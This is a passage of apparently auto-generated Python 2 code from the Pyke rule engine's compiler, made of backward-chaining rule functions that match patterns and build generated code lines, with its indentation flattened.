engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
flag_1 = False
with engine.prove(rule.rule_base.root_name, 'assertion', context,
(rule.pattern(0),
rule.pattern(1),
rule.pattern(2),
rule.pattern(3),)) \
as gen_1:
for x_1 in gen_1:
flag_1 = True
assert x_1 is None, \
"compiler.assertions_n: got unexpected plan from when clause 1"
flag_2 = False
with engine.prove(rule.rule_base.root_name, 'assertions', context,
(rule.pattern(4),
rule.pattern(5),
rule.pattern(3),
rule.pattern(6),)) \
as gen_2:
for x_2 in gen_2:
flag_2 = True
assert x_2 is None, \
"compiler.assertions_n: got unexpected plan from when clause 2"
rule.rule_base.num_bc_rule_successes += 1
yield
if not flag_2:
raise AssertionError("compiler.assertions_n: 'when' clause 2 failed")
if not flag_1:
raise AssertionError("compiler.assertions_n: 'when' clause 1 failed")
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def assertion(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
\
helpers.merge_patterns(context.lookup_data('patterns'), context.lookup_data('patterns_in'))):
context.end_save_all_undo()
mark2 = context.mark(True)
if rule.pattern(1).match_data(context, context,
(('STARTING_LINENO', context.lookup_data('start_lineno')),
"engine.assert_(%r, %r," % (context.lookup_data('kb_name'), context.lookup_data('entity_name')),
('INDENT', 15),
helpers.list_format(
("rule.pattern(%d).as_data(context)" % pat_num
for pat_num in context.lookup_data('pat_nums')),
'(', ')),'),
('ENDING_LINENO', context.lookup_data('end_lineno')),
"POPINDENT",
)):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def python_assertion(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
rule.rule_base.num_bc_rule_successes += 1
yield
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def bc_rules(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
bc_plan_lines = []
bc_bc_funs = []
bc_bc_init = []
forall356_worked = True
for python_ans in \
context.lookup_data('bc_rules'):
mark2 = context.mark(True)
if rule.pattern(0).match_data(context, context, python_ans):
context.end_save_all_undo()
forall356_worked = False
flag_3 = False
with engine.prove(rule.rule_base.root_name, 'bc_rule', context,
(rule.pattern(1),
rule.pattern(0),
rule.pattern(2),
rule.pattern(3),
rule.pattern(4),)) \
as gen_3:
for x_3 in gen_3:
flag_3 = True
assert x_3 is None, \
"compiler.bc_rules: got unexpected plan from when clause 3"
bc_plan_lines.extend(context.lookup_data('bc_plan1'))
bc_bc_funs.append(context.lookup_data('bc_bc_fun1'))
bc_bc_init.append(context.lookup_data('bc_bc_init1'))
forall356_worked = True
if forall356_worked: break
if not flag_3:
raise AssertionError("compiler.bc_rules: 'when' clause 3 failed")
if not forall356_worked:
context.undo_to_mark(mark2)
break
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
if forall356_worked:
mark5 = context.mark(True)
if rule.pattern(5).match_data(context, context,
tuple(bc_plan_lines)):
context.end_save_all_undo()
mark6 = context.mark(True)
if rule.pattern(6).match_data(context, context,
tuple(bc_bc_funs)):
context.end_save_all_undo()
mark7 = context.mark(True)
if rule.pattern(7).match_data(context, context,
tuple(bc_bc_init)):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark7)
else: context.end_save_all_undo()
context.undo_to_mark(mark6)
else: context.end_save_all_undo()
context.undo_to_mark(mark5)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def bc_rule_(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
flag_1 = False
with engine.prove(rule.rule_base.root_name, 'bc_premises', context,
(rule.pattern(0),
rule.pattern(1),
rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(5),
rule.pattern(6),
rule.pattern(7),)) \
as gen_1:
for x_1 in gen_1:
flag_1 = True
assert x_1 is None, \
"compiler.bc_rule_: got unexpected plan from when clause 1"
mark2 = context.mark(True)
if rule.pattern(8).match_data(context, context,
\
helpers.goal(context.lookup_data('rb_name'), context.lookup_data('name'), context.lookup_data('goal'),
context.lookup_data('prem_plan_lines'), context.lookup_data('python_lines'))):
context.end_save_all_undo()
mark3 = context.mark(True)
if rule.pattern(9).match_data(context, context,
(context.lookup_data('goal_fn_head'),
context.lookup_data('prem_fn_head'),
'rule.rule_base.num_bc_rule_successes += 1',
'yield context' if context.lookup_data('plan_lines') else 'yield',
context.lookup_data('prem_fn_tail'),
'rule.rule_base.num_bc_rule_failures += 1',
context.lookup_data('goal_fn_tail'),
)):
context.end_save_all_undo()
mark4 = context.mark(True)
if rule.pattern(10).match_data(context, context,
(context.lookup_data('goal_decl_lines'),
context.lookup_data('prem_decl_lines'),
"POPINDENT",
)):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark4)
else: context.end_save_all_undo()
context.undo_to_mark(mark3)
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
if not flag_1:
raise AssertionError("compiler.bc_rule_: 'when' clause 1 failed")
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def bc_premises(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
flag_1 = False
with engine.prove(rule.rule_base.root_name, 'bc_premises1', context,
(rule.pattern(0),
rule.pattern(1),
rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(5),
rule.pattern(6),
rule.pattern(7),
rule.pattern(8),
rule.pattern(9),
rule.pattern(10),
rule.pattern(11),
rule.pattern(12),
rule.pattern(13),)) \
as gen_1:
for x_1 in gen_1:
flag_1 = True
assert x_1 is None, \
"compiler.bc_premises: got unexpected plan from when clause 1"
mark2 = context.mark(True)
if rule.pattern(14).match_data(context, context,
helpers.list_format(context.lookup_data('patterns'), '(', '))')):
context.end_save_all_undo()
mark3 = context.mark(True)
if rule.pattern(15).match_data(context, context,
('(' + ' '.join(tuple(repr(plan_var_name) + ','
for plan_var_name
in context.lookup_data('plan_var_names'))) +
'),',) + context.lookup_data('pat_lines')):
context.end_save_all_undo()
mark4 = context.mark(True)
if rule.pattern(16).match_data(context, context,
tuple(itertools.chain.from_iterable(itertools.chain(
(lines for step, lines in context.lookup_data('plan_lines1') if step is None),
(lines for step, lines
in sorted(((step, lines) for step, lines in context.lookup_data('plan_lines1')
if step is not None),
key=lambda t: t[0])))))):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark4)
else: context.end_save_all_undo()
context.undo_to_mark(mark3)
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
if not flag_1:
raise AssertionError("compiler.bc_premises: 'when' clause 1 failed")
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def bc_premises1_0(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
rule.rule_base.num_bc_rule_successes += 1
yield
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def bc_premises1_n(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
flag_1 = False
with engine.prove(rule.rule_base.root_name, 'bc_premise', context,
(rule.pattern(0),
rule.pattern(1),
rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(5),
rule.pattern(6),
rule.pattern(7),
rule.pattern(8),
rule.pattern(9),
rule.pattern(10),
rule.pattern(11),
rule.pattern(12),
rule.pattern(13),)) \
as gen_1:
for x_1 in gen_1:
flag_1 = True
assert x_1 is None, \
"compiler.bc_premises1_n: got unexpected plan from when clause 1"
flag_2 = False
with engine.prove(rule.rule_base.root_name, 'bc_premises1', context,
(rule.pattern(0),
rule.pattern(1),
rule.pattern(3),
rule.pattern(14),
rule.pattern(15),
rule.pattern(5),
rule.pattern(6),
rule.pattern(8),
rule.pattern(16),
rule.pattern(10),
rule.pattern(17),
rule.pattern(18),
rule.pattern(19),
rule.pattern(20),)) \
as gen_2:
for x_2 in gen_2:
flag_2 = True
assert x_2 is None, \
"compiler.bc_premises1_n: got unexpected plan from when clause 2"
mark3 = context.mark(True)
if rule.pattern(21).match_data(context, context,
context.lookup_data('plan_lines1') + context.lookup_data('plan_lines2')):
context.end_save_all_undo()
mark4 = context.mark(True)
if rule.pattern(22).match_data(context, context,
context.lookup_data('fn_head1') + context.lookup_data('fn_head2')):
context.end_save_all_undo()
mark5 = context.mark(True)
if rule.pattern(23).match_data(context, context,
context.lookup_data('fn_tail2') + context.lookup_data('fn_tail1')):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark5)
else: context.end_save_all_undo()
context.undo_to_mark(mark4)
else: context.end_save_all_undo()
context.undo_to_mark(mark3)
if not flag_2:
raise AssertionError("compiler.bc_premises1_n: 'when' clause 2 failed")
if not flag_1:
raise AssertionError("compiler.bc_premises1_n: 'when' clause 1 failed")
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def bc_premise(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
context.lookup_data('clause_num') + 1):
context.end_save_all_undo()
mark2 = context.mark(True)
if rule.pattern(1).match_data(context, context,
context.lookup_data('kb_name') or "rule.rule_base.root_name"):
context.end_save_all_undo()
mark3 = context.mark(True)
if rule.pattern(2).match_data(context, context,
\
helpers.merge_patterns(context.lookup_data('arg_patterns'), context.lookup_data('patterns_in'))):
context.end_save_all_undo()
mark4 = context.mark(True)
if rule.pattern(3).match_data(context, context,
(('STARTING_LINENO', context.lookup_data('start_lineno')),
"with engine.prove(%s, %s, context," %
(context.lookup_data('kb_name2'), context.lookup_data('entity_name')),
('INDENT', 2),
('INDENT', 16),
helpers.list_format(('rule.pattern(%d)' % pat_num
for pat_num in context.lookup_data('pat_nums')),
'(', ')) \\'),
'POPINDENT',
"as gen_%d:" % context.lookup_data('clause_num'),
"for x_%d in gen_%d:" % (context.lookup_data('clause_num'), context.lookup_data('clause_num')),
('INDENT', 2),
)):
context.end_save_all_undo()
flag_5 = False
with engine.prove(rule.rule_base.root_name, 'add_required', context,
(rule.pattern(4),
rule.pattern(5),
rule.pattern(6),
rule.pattern(7),
rule.pattern(3),
rule.pattern(8),
rule.pattern(9),
rule.pattern(10),)) \
as gen_5:
for x_5 in gen_5:
flag_5 = True
assert x_5 is None, \
"compiler.bc_premise: got unexpected plan from when clause 5"
flag_6 = False
with engine.prove(rule.rule_base.root_name, 'gen_plan_lines', context,
(rule.pattern(5),
rule.pattern(6),
rule.pattern(7),
rule.pattern(11),
rule.pattern(12),
rule.pattern(13),
rule.pattern(14),
rule.pattern(15),
rule.pattern(16),
rule.pattern(17),
rule.pattern(18),)) \
as gen_6:
for x_6 in gen_6:
flag_6 = True
assert x_6 is None, \
"compiler.bc_premise: got unexpected plan from when clause 6"
mark7 = context.mark(True)
if rule.pattern(19).match_data(context, context,
helpers.merge_patterns(context.lookup_data('plan_vars_needed'),
context.lookup_data('plan_var_names_in'))):
context.end_save_all_undo()
mark8 = context.mark(True)
if rule.pattern(20).match_data(context, context,
context.lookup_data('fn_head2') + context.lookup_data('fn_head3') + (('ENDING_LINENO', context.lookup_data('end_lineno')),)):
context.end_save_all_undo()
mark9 = context.mark(True)
if rule.pattern(21).match_data(context, context,
(context.lookup_data('fn_tail3'),
() if context.lookup_data('break_cond') is None
else "if %s: break" % context.lookup_data('break_cond'),
context.lookup_data('fn_tail2'))):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark9)
else: context.end_save_all_undo()
context.undo_to_mark(mark8)
else: context.end_save_all_undo()
context.undo_to_mark(mark7)
if not flag_6:
raise AssertionError("compiler.bc_premise: 'when' clause 6 failed")
if not flag_5:
raise AssertionError("compiler.bc_premise: 'when' clause 5 failed")
else: context.end_save_all_undo()
context.undo_to_mark(mark4)
else: context.end_save_all_undo()
context.undo_to_mark(mark3)
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def bc_first(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
"first%d_worked" % context.lookup_data('clause_num')):
context.end_save_all_undo()
flag_2 = False
with engine.prove(rule.rule_base.root_name, 'bc_premises1', context,
(rule.pattern(1),
rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(5),
rule.pattern(0),
rule.pattern(6),
rule.pattern(7),
rule.pattern(8),
rule.pattern(9),
rule.pattern(10),
rule.pattern(11),
rule.pattern(12),
rule.pattern(13),)) \
as gen_2:
for x_2 in gen_2:
flag_2 = True
assert x_2 is None, \
"compiler.bc_first: got unexpected plan from when clause 2"
flag_3 = False
with engine.prove(rule.rule_base.root_name, 'add_required', context,
(rule.pattern(14),
rule.pattern(1),
rule.pattern(2),
rule.pattern(3),
rule.pattern(12),
rule.pattern(13),
rule.pattern(15),
rule.pattern(16),)) \
as gen_3:
for x_3 in gen_3:
flag_3 = True
assert x_3 is None, \
"compiler.bc_first: got unexpected plan from when clause 3"
mark4 = context.mark(True)
if rule.pattern(17).match_data(context, context,
"%s = False" % context.lookup_data('break_cond')):
context.end_save_all_undo()
mark5 = context.mark(True)
if rule.pattern(18).match_data(context, context,
"%s = True" % context.lookup_data('break_cond')):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark5)
else: context.end_save_all_undo()
context.undo_to_mark(mark4)
if not flag_3:
raise AssertionError("compiler.bc_first: 'when' clause 3 failed")
if not flag_2:
raise AssertionError("compiler.bc_first: 'when' clause 2 failed")
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def bc_forall_None(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
flag_1 = False
with engine.prove(rule.rule_base.root_name, 'bc_premises1', context,
(rule.pattern(0),
rule.pattern(1),
rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(5),
rule.pattern(6),
rule.pattern(7),
rule.pattern(8),
rule.pattern(9),
rule.pattern(10),
rule.pattern(11),
rule.pattern(12),
rule.pattern(13),)) \
as gen_1:
for x_1 in gen_1:
flag_1 = True
assert x_1 is None, \
"compiler.bc_forall_None: got unexpected plan from when clause 1"
mark2 = context.mark(True)
if rule.pattern(14).match_data(context, context,
context.lookup_data('fn_head1') + context.lookup_data('fn_tail')):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
if not flag_1:
raise AssertionError("compiler.bc_forall_None: 'when' clause 1 failed")
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def bc_forall_require(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
"forall%d_worked" % context.lookup_data('start_lineno')):
context.end_save_all_undo()
mark2 = context.mark(True)
if rule.pattern(1).match_data(context, context,
"not forall%d_worked" % context.lookup_data('start_lineno')):
context.end_save_all_undo()
flag_3 = False
with engine.prove(rule.rule_base.root_name, 'bc_premises1', context,
(rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(5),
rule.pattern(6),
rule.pattern(1),
rule.pattern(7),
rule.pattern(8),
rule.pattern(9),
rule.pattern(10),
rule.pattern(11),
rule.pattern(12),
rule.pattern(13),
rule.pattern(14),)) \
as gen_3:
for x_3 in gen_3:
flag_3 = True
assert x_3 is None, \
"compiler.bc_forall_require: got unexpected plan from when clause 3"
flag_4 = False
with engine.prove(rule.rule_base.root_name, 'bc_premises1', context,
(rule.pattern(2),
rule.pattern(3),
rule.pattern(5),
rule.pattern(15),
rule.pattern(16),
rule.pattern(0),
rule.pattern(7),
rule.pattern(9),
rule.pattern(17),
rule.pattern(11),
rule.pattern(18),
rule.pattern(12),
rule.pattern(19),
rule.pattern(20),)) \
as gen_4:
for x_4 in gen_4:
flag_4 = True
assert x_4 is None, \
"compiler.bc_forall_require: got unexpected plan from when clause 4"
mark5 = context.mark(True)
if rule.pattern(21).match_data(context, context,
("forall%d_worked = True" % context.lookup_data('start_lineno'),
context.lookup_data('fn_head1'),
"forall%d_worked = False" % context.lookup_data('start_lineno'),
context.lookup_data('fn_head2'),
"forall%d_worked = True" % context.lookup_data('start_lineno'),
context.lookup_data('fn_tail2'),
context.lookup_data('fn_tail1'),
"if forall%d_worked:" % context.lookup_data('start_lineno'),
("INDENT", 2))):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark5)
if not flag_4:
raise AssertionError("compiler.bc_forall_require: 'when' clause 4 failed")
if not flag_3:
raise AssertionError("compiler.bc_forall_require: 'when' clause 3 failed")
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def bc_notany(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
"notany%d_worked" % context.lookup_data('start_lineno')):
context.end_save_all_undo()
mark2 = context.mark(True)
if rule.pattern(1).match_data(context, context,
"not notany%d_worked" % context.lookup_data('start_lineno')):
context.end_save_all_undo()
flag_3 = False
with engine.prove(rule.rule_base.root_name, 'bc_premises1', context,
(rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(5),
rule.pattern(6),
rule.pattern(1),
rule.pattern(7),
rule.pattern(8),
rule.pattern(9),
rule.pattern(10),
rule.pattern(11),
rule.pattern(12),
rule.pattern(13),
rule.pattern(14),)) \
as gen_3:
for x_3 in gen_3:
flag_3 = True
assert x_3 is None, \
"compiler.bc_notany: got unexpected plan from when clause 3"
mark4 = context.mark(True)
if rule.pattern(15).match_data(context, context,
("notany%d_worked = True" % context.lookup_data('start_lineno'),
context.lookup_data('fn_head1'),
"notany%d_worked = False" % context.lookup_data('start_lineno'),
context.lookup_data('fn_tail1'),
"if notany%d_worked:" % context.lookup_data('start_lineno'),
("INDENT", 2)) ):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark4)
if not flag_3:
raise AssertionError("compiler.bc_notany: 'when' clause 3 failed")
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def no_plan(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
('assert x_%d is None, \\' % context.lookup_data('clause_num'),
('INDENT', 2),
'"%(rb_name)s.%(rule_name)s: got unexpected plan from '
'when clause %(clause_num)d"' %
{'clause_num': context.lookup_data('clause_num'),
'rb_name': context.lookup_data('rb_name'),
'rule_name': context.lookup_data('rule_name')},
'POPINDENT',)):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def as_plan(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
\
helpers.merge_pattern("contexts.variable(%r)" % context.lookup_data('pat_var_name'),
context.lookup_data('patterns_in'))):
context.end_save_all_undo()
flag_2 = False
with engine.prove(rule.rule_base.root_name, 'plan_bindings', context,
(rule.pattern(1),
rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(5),
rule.pattern(6),
rule.pattern(7),)) \
as gen_2:
for x_2 in gen_2:
flag_2 = True
assert x_2 is None, \
"compiler.as_plan: got unexpected plan from when clause 2"
rule.rule_base.num_bc_rule_successes += 1
yield
if not flag_2:
raise AssertionError("compiler.as_plan: 'when' clause 2 failed")
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def plan_spec(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
\
helpers.merge_pattern("contexts.variable(%r)" % context.lookup_data('plan_var_name'),
context.lookup_data('patterns_in'))):
context.end_save_all_undo()
flag_2 = False
with engine.prove(rule.rule_base.root_name, 'plan_bindings', context,
(rule.pattern(1),
rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(5),
rule.pattern(6),
rule.pattern(7),)) \
as gen_2:
for x_2 in gen_2:
flag_2 = True
assert x_2 is None, \
"compiler.plan_spec: got unexpected plan from when clause 2"
rule.rule_base.num_bc_rule_successes += 1
yield
if not flag_2:
raise AssertionError("compiler.plan_spec: 'when' clause 2 failed")
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def illegal_plan_spec(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
helpers.syntax_error("illegal plan_spec in forall",
context.lookup_data('lineno'), context.lookup_data('lexpos'))):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def plan_bindings(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
('assert x_%d is not None, \\' % context.lookup_data('clause_num'),
('INDENT', 2),
'"%(rb_name)s.%(rule_name)s: expected plan from '
'when clause %(clause_num)d"' %
{'clause_num': context.lookup_data('clause_num'),
'rb_name': context.lookup_data('rb_name'),
'rule_name': context.lookup_data('rule_name')},
'POPINDENT',
"mark%d = context.mark(True)" % context.lookup_data('clause_num'),
"if not rule.pattern(%d).match_data(context, context, "
"x_%d):" % (context.lookup_data('pat_num'), context.lookup_data('clause_num')),
('INDENT', 2),
'raise AssertionError("%(rb_name)s.%(rule_name)s: '
'plan match to $%(plan_var_name)s failed in '
'when clause %(clause_num)d")' %
{'clause_num': context.lookup_data('clause_num'),
'plan_var_name': context.lookup_data('plan_var_name'),
'rb_name': context.lookup_data('rb_name'),
'rule_name': context.lookup_data('rule_name')},
'POPINDENT',
"context.end_save_all_undo()")):
context.end_save_all_undo()
mark2 = context.mark(True)
if rule.pattern(1).match_data(context, context,
("context.undo_to_mark(mark%d)" % context.lookup_data('clause_num'),)):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def not_required(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
rule.rule_base.num_bc_rule_successes += 1
yield
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def required(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
("flag_%d = False" % context.lookup_data('clause_num'),
context.lookup_data('fn_head1'),
"flag_%d = True" % context.lookup_data('clause_num'),
)):
context.end_save_all_undo()
mark2 = context.mark(True)
if rule.pattern(1).match_data(context, context,
(context.lookup_data('fn_tail1'),
"if not flag_%d:" % context.lookup_data('clause_num'),
("INDENT", 2),
"raise AssertionError(\"%s.%s: 'when' clause %d failed\")"
% (context.lookup_data('rb_name'), context.lookup_data('rule_name'), context.lookup_data('clause_num')),
"POPINDENT",
)):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def bc_python_premise(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
